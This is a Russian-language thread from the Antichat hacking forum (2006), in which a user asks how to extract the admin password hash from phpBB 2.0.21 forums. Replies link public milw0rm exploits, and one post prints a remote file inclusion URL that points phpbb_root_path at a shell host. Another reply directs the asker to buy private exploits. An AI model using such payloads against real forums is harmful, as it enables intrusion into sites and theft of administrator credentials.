ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Кто реально вытаскивал хеш админа форума на phpBB2.0.21?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Кто реально вытаскивал хеш админа форума на phpBB2.0.21?
  #1  
Старый 25.10.2006, 14:48
oxigen
Новичок
Регистрация: 19.12.2005
Сообщений: 7
Провел на форуме:
12565

Репутация: 0
Arrow Кто реально вытаскивал хеш админа форума на phpBB2.0.21?
Сейчас phpBB один из самых стабильных состем форумов.
Есть ли такие перцы кто всё же ломал последню версию?

Если не секрет то как? каким экспойтом, или чем-то другим?

Поделись - интересно.

Пробывали многие, но у кого получалось?
 
Ответить с цитированием

  #2  
Старый 25.10.2006, 15:01
rijy
Постоянный
Регистрация: 25.09.2006
Сообщений: 451
Провел на форуме:
2639641

Репутация: 1573
По умолчанию
multiple PHP application poison NULL byte vulnerability phpBB 2.0.21
http://milw0rm.com/exploits/2348

Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability
http://milw0rm.com/exploits/2429

з.ы. сам пока не пробовал эту версию...
 
Ответить с цитированием

  #3  
Старый 25.10.2006, 20:21
Brahma
Познающий
Регистрация: 14.07.2006
Сообщений: 85
Провел на форуме:
72678

Репутация: 31
По умолчанию
последний сплойт
Код:
Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM
В упор не вижу файла admin_topic_action_logging.php?... (во 2ой ветке..)
 
Ответить с цитированием

  #4  
Старый 27.10.2006, 05:00
syntacsis
Участник форума
Регистрация: 14.11.2005
Сообщений: 146
Провел на форуме:
981128

Репутация: 43
По умолчанию
Цитата:
Сообщение от Brahma  
В упор не вижу файла admin_topic_action_logging.php?... (во 2ой ветке..)
Неудивительно =)
Это файл от мода "Admin Topic Action Logging Mod" для phpbb. Сплоит если и будет работать, то только на форуме с этим модом

Цитата:
Сообщение от oxigen  
Есть ли такие перцы кто всё же ломал последню версию?
Если не секрет то как? каким экспойтом, или чем-то другим?
Поделись - интересно.
Насколько мне известно, такие перцы есть. И тут на ачате тоже. И совсем не секрет, чем они ломали - мозгами и руками. =)
Последний раз редактировалось syntacsis; 27.10.2006 в 05:13..
 
Ответить с цитированием

  #5  
Старый 27.10.2006, 16:44
oxigen
Новичок
Регистрация: 19.12.2005
Сообщений: 7
Провел на форуме:
12565

Репутация: 0
По умолчанию
syntacsis, дай плх их ники. Просто задать пару вопросов, ну или пусть сами отвят каким эксплойтом или снифером. Мне нужно знать чем, а уж как я разберусь.
Как ни как поиск рулит!
 
Ответить с цитированием

  #6  
Старый 27.10.2006, 19:07
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию
Цитата:
Сообщение от oxigen  
ну или пусть сами отвят каким эксплойтом или снифером
тут тебе этого не ответят ) ибо приват сплойты
Обратись в Роздел "покупка продажа" и напиши сплойт "для такой-то версии"
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
форумные движки: обзор и обсуждение nerezus ПО для Web разработчика 61 29.04.2010 10:08
Как узнать пароли участников форума с правами админа? WEED Форумы 9 14.05.2006 19:24
Подскажите. Был хеш админа, потом его переименовали glu Расшифровка хешей 1 16.03.2006 16:41
А нафига публиковать инфу о том как ломать чаты. Егорыч+++ Чаты 52 14.11.2005 20:23
Есть хеш админа форума phpBB.Можно ли заменитьть куки, чтобы получить права админа? proff Форумы 14 06.05.2005 06:00



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ